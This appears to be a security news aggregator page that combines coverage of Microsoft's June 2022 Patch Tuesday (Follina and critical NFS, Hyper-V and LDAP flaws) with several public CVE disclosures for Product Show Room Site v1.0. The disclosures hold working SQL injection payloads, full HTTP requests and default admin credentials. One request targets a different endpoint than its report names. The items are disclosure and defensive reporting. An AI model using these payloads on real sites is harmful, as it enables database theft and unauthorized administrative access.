Here are which Microsoft patches to prioritize among the June Patch Tuesday batch.

Microsoft today issued a patch for the recently disclosed and widely exploited "Follina" zero-day vulnerability in the Microsoft Support Diagnostic Tool (MSDT) as part of its scheduled security update for June.

The patch is among the more significant of the 60 security updates that the company released in total today to address vulnerabilities across its product portfolio. Microsoft assessed three of the bugs as being of critical severity: CVE-2022-30136, a remote code execution vulnerability in the Windows Network File System (NFS); CVE-2022-30163, an RCE in Windows Hyper-V; and CVE-2022-30139, a remote code execution flaw in the Windows Lightweight Access Protocol.

Microsoft assessed most of the other vulnerabilities — including many remote code execution bugs — as "important."

Affected products included Windows, Office, Edge, Visual Studio, Windows Defender, SharePoint Server, and the Windows Lightweight Directory Access Protocol.

**Fix for Follina Flaw**

Security experts identified the patch for the Follina vulnerability (CVE-2022-30190) as a priority due to how actively the bug is being exploited in the wild. The MSDT bug — disclosed on May 30 — basically gives attackers a trivially easy way to execute code remotely via Office documents, even when macros are disabled. Microsoft has warned of the vulnerability allowing attackers to view or delete data, install programs, and create new accounts on compromised systems. Cyberattacks exploiting the flaw were reported at least one month prior to Microsoft’s May 30 announcement and have since then grown, fueled by the public availability of exploit code.

Andy Gill, senior security consultant at Lares Consulting, says Microsoft's new patch for Follina prevents code injection. However, exploit code will still launch msdt.exe, he says. "Therefore, while the main risk of code execution is mitigated the software is still launched," he says.

Johannes Ullrich, dean of research at the SANS Institute, says it's a good idea therefore for organizations to keep Microsoft’s recommended mitigations for the flaw in place even after they install the MSDT update. "Users applying the monthly rollup will be protected but need to realize that the patch fixed the code injection vulnerability in msdt.exe. The diagnostic tool itself will still launch if a user opens an affected document.

"Follina has been actively exploited for a couple weeks now," Ullrich says. "\[Microsoft's\] workaround, will prevent msdt.exe from launching \[and\] should probably stay in place if it doesn't cause any problems."

**Three Critical Flaws to Patch Now**

In a blog post, Dustin Childs, communications manager at Trend Micro’s Zero Day Initiative, described the critical CVE-2022-30136 vulnerability as “eerily similar” to an NFS bug that Microsoft patched last month (CVE-2022-26937) that allows attackers to execute privileged code on vulnerable systems. Attackers can exploit the flaw by sending specially crafted RPC calls to a vulnerable server, according to ZDI. The only apparent difference in the patches is that this month's update fixes the bug in NFS V4.1, while last month's update pertained to two older NFS versions, he said.

"It's not clear if this is a variant or a failed patch or a completely new issue. Regardless, enterprises running NFS should prioritize testing and deploying this fix," Childs said.

Ullrich says this marks the third month in a row where Microsoft has issued an update to address a critical security vulnerability in NFS. "But the component is not enabled by default and so far, we do not see any exploits for these vulnerabilities," he says.

The remote code execution vulnerability in Windows Hyper-V (CVE-2022-30163) is another patch to apply ASAP, security researchers said. Kevin Breen, director of cyber threat research at Immersive, identified it as a vulnerability that is likely going to be of high value to attackers if a method for easily exploiting it is discovered. The flaw basically gives attackers a way to move from a guest virtual machine to the host in order to access all running VM machines on that system. However, exploiting the flaw — at least presently — is complex and requires the attacker to win an unspecific race condition, Breen said in emailed comments.

Meanwhile, the third critical flaw (CVE-2022-30139) is one of seven LDAP flaws that Microsoft patched this month. Though the flaw is difficult to exploit, it is one in a growing number of security issues uncovered in the directory technology. In May, for instance, Microsoft issued patches for 10 LDAP flaws, Childs said. The volume of LDAP bugs in recent months makes LDAP an attractive attack target for threat actors, he noted.

Childs also cited CVE-2022-30148, an information disclosure vulnerability in the Windows Desired State Configuration feature. The flaw is important because attackers could use it to — among other things — recover usernames and plaintext passwords from log file. "Since DSC is often used by SysAdmins to maintain machine configurations in an enterprise, they are likely some sought-after username/password combos that could be recovered," Childs wrote. The bug also facilitates lateral movement so organization using DSC need to implement Microsoft's fix for it, he said.

**'Dig a Bit Deeper'**

ZDI's analysis shows that more than half the vulnerabilities that Microsoft disclosed today are remote code execution issues. Twelve updates address elevation of privilege bugs, several of which require attackers to already have access on a system and run specially crafted code.

Breen, meanwhile, identified several other vulnerabilities organizations should address. These include two remote execution flaws in Microsoft SharePoint Server (CVE-2022-30157 and CVE-2022-30158) that enable data theft, replace documents with malicious ones, and carry out other malicious activities. Also important in the June roundup is CVE-2022-30147, a local privilege escalation flaw in Windows Installer, which Microsoft has assigned a severity rating of 7.8. That rating belies the danger these kinds of flaws present because threat actors almost always use them in attacks, Breen said.

Chris Goettl, senior director of product management at Ivanti, advises organizations to pay attention to CVE-2022-26925, a spoofing vulnerability in the Windows LSA function for enforcing security policies. The vulnerability gives attackers a way to authenticate to domain controllers and impacts all Windows servers. Microsoft has recommended that organizations prioritize domain controllers when applying the security update.

The vulnerability has been publicly disclosed and vulnerabilities for it have been detected in the wild, Goettl says. 

"The vulnerability by itself is only rated as Important by Microsoft, and the exploit code maturity is listed as unproven," Goettl says. "But dig a bit deeper and the vulnerability is much more threatening. The vulnerability has been detected in attacks, so while code samples available publicly may be unproven, there are working exploits being used."

Goettl also recommends that organizations review Microsoft's FAQ for the scheduled retirement of Internet Explorer 11 desktop app on June 15, right after Patch Tuesday.

The FAQ answers many questions on what organizations can expect when the IE11 application will be disabled, and how that affects different versions of Windows including the LTSC enterprise edition of Windows, It also offers details on configuring IE mode in the Microsoft Edge browser to support legacy applications that require IE11, and more, Goettl says.

Microsoft Patches 'Follina' Zero-Day Flaw in Monthly Security Update

Product Show Room Site v1.0 is vulnerable to SQL Injection via /psrs/admin/categories/view_category.php?id=.

**Product Show Room Site v1.0 by oretnom23 has SQL injection**

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/15370/product-show-room-site-phpoop-free-source-code.html

Vulnerability File: /psrs/admin/categories/view\_category.php?id=

Vulnerability location: /psrs/admin/categories/view\_category.php?id=, id

Current database name: psrs\_db ,length is 7

\[+\] Payload: /psrs/admin/categories/view\_category.php?id=1%27%20and%20length(database())%20=7--+ // Leak place ---> id

GET /psrs/admin/categories/view\_category.php?id\=1%27%20and%20length(database())%20\=7\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=7g6mvmuq5m1o1cvqrhprll4jr1
Connection: close

When length (database ()) = 6, Content-Length: 780 

When length (database ()) = 7, Content-Length: 552

CVE-2022-32363: bug_report/SQLi-8.md at main · k0xx11/bug_report

Product Show Room Site v1.0 is vulnerable to SQL Injection via /psrs/admin/categories/manage_category.php?id=.

**Product Show Room Site v1.0 by oretnom23 has SQL injection**

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/15370/product-show-room-site-phpoop-free-source-code.html

Vulnerability File: /psrs/admin/categories/manage\_category.php?id=

Vulnerability location: /psrs/admin/categories/manage\_category.php?id=, id

Current database name: psrs\_db ,length is 7

\[+\] Payload: /psrs/admin/categories/manage\_category.php?id=1%27%20and%20length(database())%20=7--+ // Leak place ---> id

GET /psrs/admin/categories/manage\_category.php?id\=1%27%20and%20length(database())%20\=7\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=7g6mvmuq5m1o1cvqrhprll4jr1
Connection: close

When length (database ()) = 6, Content-Length: 2070 

When length (database ()) = 7, Content-Length: 2083

CVE-2022-32362: bug_report/SQLi-9.md at main · k0xx11/bug_report

Product Show Room Site v1.0 is vulnerable to SQL Injection via /psrs/classes/Master.php?f=delete_category.

**Product Show Room Site v1.0 by oretnom23 has SQL injection**

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/15370/product-show-room-site-phpoop-free-source-code.html

Vulnerability File: /psrs/classes/Master.php?f=delete\_category

Vulnerability location: /psrs/classes/Master.php?f=delete\_category, id

Current database name: psrs\_db ,length is 7

\[+\] Payload: id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /psrs/classes/Master.php?f\=delete\_category HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=7g6mvmuq5m1o1cvqrhprll4jr1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-32359: bug_report/SQLi-3.md at main · k0xx11/bug_report

Product Show Room Site v1.0 is vulnerable to SQL Injection via /psrs/classes/Master.php?f=delete_inquiry.

**Product Show Room Site v1.0 by oretnom23 has SQL injection**

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/15370/product-show-room-site-phpoop-free-source-code.html

Vulnerability File: /psrs/classes/Master.php?f=delete\_inquiry

Vulnerability location: /psrs/classes/Master.php?f=delete\_inquiry, id

Current database name: psrs\_db ,length is 7

\[+\] Payload: id=4' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /psrs/classes/Master.php?f\=delete\_field HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=7g6mvmuq5m1o1cvqrhprll4jr1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
id=4' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-32358: bug_report/SQLi-5.md at main · k0xx11/bug_report

Product Show Room Site v1.0 is vulnerable to SQL Injection via /psrs/admin/?page=products/view_product&id=.

**Product Show Room Site v1.0 by oretnom23 has SQL injection**

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/15370/product-show-room-site-phpoop-free-source-code.html

Vulnerability File: /psrs/admin/?page=products/view\_product&id=

Vulnerability location: /psrs/admin/?page=products/view\_product&id=, id

Current database name: psrs\_db ,length is 7

\[+\] Payload: /psrs/admin/?page=products/view\_product&id=3%27%20and%20length(database())%20=7--+// Leak place ---> id

GET /psrs/admin/?page\=products/view\_product&id\=3%27%20and%20length(database())%20\=7\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=7g6mvmuq5m1o1cvqrhprll4jr1
Connection: close

When length (database ()) = 6, Content-Length: 31202 

When length (database ()) = 7, Content-Length: 33019

CVE-2022-32355: bug_report/SQLi-6.md at main · k0xx11/bug_report

Product Show Room Site v1.0 is vulnerable to SQL Injection via /psrs/admin/?page=user/manage_user&id=.

**Product Show Room Site v1.0 by oretnom23 has SQL injection**

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/15370/product-show-room-site-phpoop-free-source-code.html

Vulnerability File: /psrs/admin/?page=user/manage\_user&id=

Vulnerability location: /psrs/admin/?page=user/manage\_user&id=, id

Current database name: psrs\_db ,length is 7

\[+\] Payload: /psrs/admin/?page=user/manage\_user&id=-7%27%20union%20select%201,database(),3,4,5,6,7,8,9,10,11--+ // Leak place ---> id

GET /psrs/admin/?page\=user/manage\_user&id\=\-7%27%20union%20select%201,database(),3,4,5,6,7,8,9,10,11\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=7g6mvmuq5m1o1cvqrhprll4jr1
Connection: close

CVE-2022-32354: bug_report/SQLi-2.md at main · k0xx11/bug_report

Product Show Room Site v1.0 is vulnerable to SQL Injection via /psrs/admin/categories/manage_field_order.php?id=.

**Product Show Room Site v1.0 by oretnom23 has SQL injection**

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/15370/product-show-room-site-phpoop-free-source-code.html

Vulnerability File: /psrs/admin/categories/manage\_field\_order.php?id=

Vulnerability location: /psrs/admin/categories/manage\_field\_order.php?id=, id

Current database name: psrs\_db ,length is 7

\[+\] Payload: /psrs/admin/categories/manage\_field\_order.php?id=-1%27%20union%20select%201,2,database(),4,5,6,7,8--+ // Leak place ---> id

GET /psrs/admin/categories/manage\_field\_order.php?id\=\-1%27%20union%20select%201,2,database(),4,5,6,7,8\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=7g6mvmuq5m1o1cvqrhprll4jr1
Connection: close

CVE-2022-32353: bug_report/SQLi-1.md at main · k0xx11/bug_report

By Chetan Raghuprasad.
Microsoft released its monthly security update Tuesday, disclosing 55 vulnerabilities in the company’s firmware and software. One of these vulnerabilities is considered critical, 40 are listed as high severity, and the remainder is considered "moderate." 
The most...


[[ This is only the beginning! Please visit the blog for the complete entry ]]

_By Chetan Raghuprasad._

Microsoft released its monthly security update Tuesday, disclosing 55 vulnerabilities in the company’s firmware and software. One of these vulnerabilities is considered critical, 40 are listed as high severity, and the remainder is considered "moderate." 

The most serious issue is CVE-2022-30136, a remote code execution vulnerability in the Windows Network File System (NFS) service, version NFSv4.1, with a severity score of near-maximum 9.8. An attacker can exploit the vulnerability over the network by making an unauthenticated, specially crafted call to a Network File System (NFS) service to execute remote code. To mitigate this vulnerability, users are advised to disable the vulnerable version NFSV4.1 and restart the NFS server or reboot the machine.

Microsoft SharePoint server contains a remote code execution vulnerability, CVE-2022-30157, with a severity score of 8.8. To exploit this vulnerability, the attacker must be authenticated and have the correct privileges to create a page on the vulnerable SharePoint server. If a targeted victim clicks on a specific page, it could trigger code remotely on the target server. If the adversary also has access to the server with the sandboxed Code Service enabled, they could execute the code in the context of the web service account. 

Two other high-severity vulnerabilities, CVE-2022-30153 and CVE-2022-30161, exist in the Windows Lightweight Directory Access Protocol (LDAP). These issues could lead to remote code execution. An attacker could exploit these vulnerabilities by tricking an authenticated victim on the targeted network to connect to a malicious LDAP server with an LDAP client on the victim’s machine. Then, they must send specially crafted replies to the client that exploits the vulnerability and permits the execution of the arbitrary code within the context of the victim’s LDAP client application. 

Another high-severity vulnerability, CVE-2022-30141, in Windows Lightweight Directory Access Protocol (LDAP) is applicable for the users who have set a value higher than the default for MaxReceiveBuffer LDAP policy. The attacker requires preparation in the victim’s environment to exploit this vulnerability, but successful exploitation would result in the attacker’s code running in the context of the SYSTEM account. 

Microsoft Kerberos has two high-severity vulnerabilities. One, CVE-2022-30165, is an elevation of privilege vulnerability that affects the Windows servers activated within the Windows Server configured with Remote Credential Guard (RCG) and Credential Security Service Provider (CredSSP) features. An unauthenticated attacker exploiting this vulnerability could elevate privileges and then spoof the Kerberos login process when a Remote Credential Guard (RCG) connection is made via Credential Security Service Provider (CredSSP) over the network. 

The other, CVE-2022-30164, is a Kerberos AppContainer Security feature bypass vulnerability where a low-privilege attacker could execute a malicious script within an Application Container to request a service ticket and elevate the service privilege, leading to execute code or access resources at a higher integrity level than that of the Application Container execution environment. 

Windows Hyper-V also contains a high-severity vulnerability, CVE-2022-30163, that could lead to remote code execution. An attacker needs to run a specially crafted application on a Hyper-V guest to exploit this vulnerability. A successful attack would allow the attacker to traverse the Hyper-V guest’s security boundary to execute arbitrary code on the Hyper-V host execution environment.  

CVE-2022-30160 is another privilege escalation vulnerability that exists in the Windows Advanced Local Procedure Call (ALPC) where an attacker winning a race condition leads to a use-after-free condition in the ALPC of the Windows NT kernel.

A complete list of all the vulnerabilities Microsoft disclosed this month is available on its update page. 

In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Cisco Secure Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. 

The rules included in this release that protect against the exploitation of many of these vulnerabilities are 59967, 59968, 59971 and 59972. There are also Snort 3 rules 300201 and 300202.

Microsoft Patch Tuesday for June 2022 — Snort rules and prominent vulnerabilities

Product Show Room Site v1.0 is vulnerable to SQL Injection via /psrs/admin/?page=inquiries/view_inquiry&id=.

**Product Show Room Site v1.0 by oretnom23 has SQL injection**

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/15370/product-show-room-site-phpoop-free-source-code.html

Vulnerability File: /psrs/admin/?page=inquiries/view\_inquiry&id=

Vulnerability location: /psrs/admin/?page=inquiries/view\_inquiry&id=, id

Current database name: psrs\_db ,length is 7

\[+\] Payload: /psrs/admin/?page=inquiries/view\_inquiry&id=4%27%20and%20length(database())%20=7--+ // Leak place ---> id

GET /psrs/admin/?page\=inquiries/view\_inquiry&id\=4%27%20and%20length(database())%20\=7\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=7g6mvmuq5m1o1cvqrhprll4jr1
Connection: close

When length (database ()) = 6, Content-Length: 28396 

When length (database ()) = 7, Content-Length: 28475

Tag

#windows